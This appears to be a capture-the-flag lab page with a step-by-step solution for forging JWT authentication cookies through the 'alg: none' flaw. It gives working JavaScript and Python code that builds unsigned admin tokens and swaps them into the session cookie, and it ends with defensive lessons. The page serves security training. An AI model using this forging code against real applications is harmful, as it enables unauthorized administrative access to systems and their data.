Avatar

Labs / Cookie Forge

  • Challenge
  • Released 16 Sep 2025

🍪 Can you forge the perfect authentication cookie?

This corporate employee portal relies on JWT cookies to manage user sessions and access controls, but the developers made some critical security assumptions. 🔐 What appears to be a secure authentication system might just be waiting for the right manipulation to unlock administrative privileges. 💡 Master the art of JWT token forging and discover how a simple cookie modification can grant you access to the company's most sensitive data! 🕵️

1
Flags
1
Points
Challenge
Solution Available
Pro Exclusive
Start Lab Environment
~1-2 min setup
AWS dedicated
Private instance
Industry standard
Challenge

🍪 Cookie Forge - Complete Solution

Objective: Manipulate JWT authentication cookies to escalate privileges from regular employee to administrator and retrieve the hidden flag.
🔍 Step 1: Access the Employee Portal

Navigate to to access the corporate employee portal. You'll see a login form where you can authenticate as a regular employee.

🔍 Step 2: Login as Regular Employee

Use the provided test credentials to login (admin login is disabled for security):

Username: employee
Password: password123

After successful login, you'll be redirected to the employee dashboard where you can see basic employee information but no administrative functions. Note that direct admin login is not possible - you must use JWT manipulation.

🔍 Step 3: Analyze the JWT Cookie

Open browser Developer Tools (F12) and examine the cookies. You'll find an authentication cookie named auth_token containing a JWT. Copy this token and analyze its structure.

JWT Structure: header.payload.signature
Example: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiZW1wbG95ZWUiLCJyb2xlIjoiZW1wbG95ZWUiLCJleHAiOjE2OTQ1MjQ4MDB9.signature
🔍 Step 4: Decode the JWT Payload

Decode the JWT payload (middle section) using Base64 decoding. You can use online tools like jwt.io or browser console:

// In browser console
let payload = 'eyJ1c2VyIjoiZW1wbG95ZWUiLCJyb2xlIjoiZW1wbG95ZWUiLCJleHAiOjE2OTQ1MjQ4MDB9';
console.log(JSON.parse(atob(payload)));

The decoded payload reveals:

{
  "user": "employee",
  "role": "employee",
  "exp": 1694524800
}
🔍 Step 5: Identify the Vulnerability

The key vulnerability is that the application accepts JWT tokens with "alg": "none" in the header, which means no signature verification is performed. This allows us to forge tokens without knowing the secret key.

🔍 Step 6: Forge an Administrative JWT

Create a new JWT with administrative privileges:

// Step 1: Create new header with 'none' algorithm
let newHeader = {
  "typ": "JWT",
  "alg": "none"
};

// Step 2: Create new payload with admin role
let newPayload = {
  "user": "admin",
  "role": "admin",
  "exp": Math.floor(Date.now() / 1000) + 3600
};

// Step 3: Encode both parts
let encodedHeader = btoa(JSON.stringify(newHeader)).replace(/=/g, '');
let encodedPayload = btoa(JSON.stringify(newPayload)).replace(/=/g, '');

// Step 4: Create forged JWT (no signature needed for 'none' algorithm)
let forgedJWT = encodedHeader + '.' + encodedPayload + '.';
console.log('Forged JWT:', forgedJWT);
🔍 Step 7: Replace the Authentication Cookie

In the browser Developer Tools:

  1. Go to the Application or Storage tab
  2. Find the auth_token cookie
  3. Replace its value with your forged JWT
  4. Refresh the page or navigate to /admin

Alternatively, use the console:

// Replace the cookie with forged JWT
document.cookie = 'auth_token=' + forgedJWT + '; path=/';
// Refresh the page
location.reload();
🔍 Step 8: Access Administrative Functions

After replacing the cookie, you should now have access to administrative functions. Navigate to /admin or look for admin menu options that weren't visible before.

🔍 Step 9: Retrieve the Flag

In the admin panel at /admin, you'll find several sections:

  • System Information: Contains version and database details
  • User Management: Shows all system users
  • Sensitive Configuration: Contains API keys and system secrets

The flag is located in the System Secrets section under Security Token. It will be displayed as a UUID format flag.

🔍 Alternative Methods
Method 1: Using JWT.io
  1. Go to jwt.io
  2. Paste your original JWT in the encoded section
  3. Change the algorithm to "none" in the header
  4. Modify the role to "admin" in the payload
  5. Copy the resulting JWT (without signature)
Method 2: Command Line Tools
# Using Python
import base64
import json

header = {"typ": "JWT", "alg": "none"}
payload = {"user": "admin", "role": "admin", "exp": 1694524800}

encoded_header = base64.b64encode(json.dumps(header).encode()).decode().rstrip('=')
encoded_payload = base64.b64encode(json.dumps(payload).encode()).decode().rstrip('=')

forged_jwt = f"{encoded_header}.{encoded_payload}."
print(forged_jwt)
Method 3: API Information Access
// Check user info with forged JWT
fetch('/api/user-info', {
  headers: {
    'Cookie': 'auth_token=' + forgedJWT
  }
}).then(r => r.json()).then(console.log);
📚 Key Learning Points
  • JWT Structure: Understanding header, payload, and signature components
  • Algorithm Confusion: The danger of accepting 'none' algorithm JWTs
  • Cookie Manipulation: How to modify authentication cookies in browsers
  • Privilege Escalation: Escalating from employee to admin through token manipulation
  • Base64 Encoding: Understanding JWT encoding and decoding processes
🛡️ Security Implications
  • Never Accept 'none' Algorithm: Always validate JWT signatures
  • Proper Key Management: Use strong, secret keys for JWT signing
  • Algorithm Validation: Explicitly validate the algorithm used in JWTs
  • Role Validation: Always verify user roles on the server side
  • Token Expiration: Implement proper token expiration and refresh mechanisms
Real-World Application: This vulnerability demonstrates why proper JWT implementation is crucial. Many applications fall victim to algorithm confusion attacks where attackers can forge tokens by changing the algorithm to 'none'.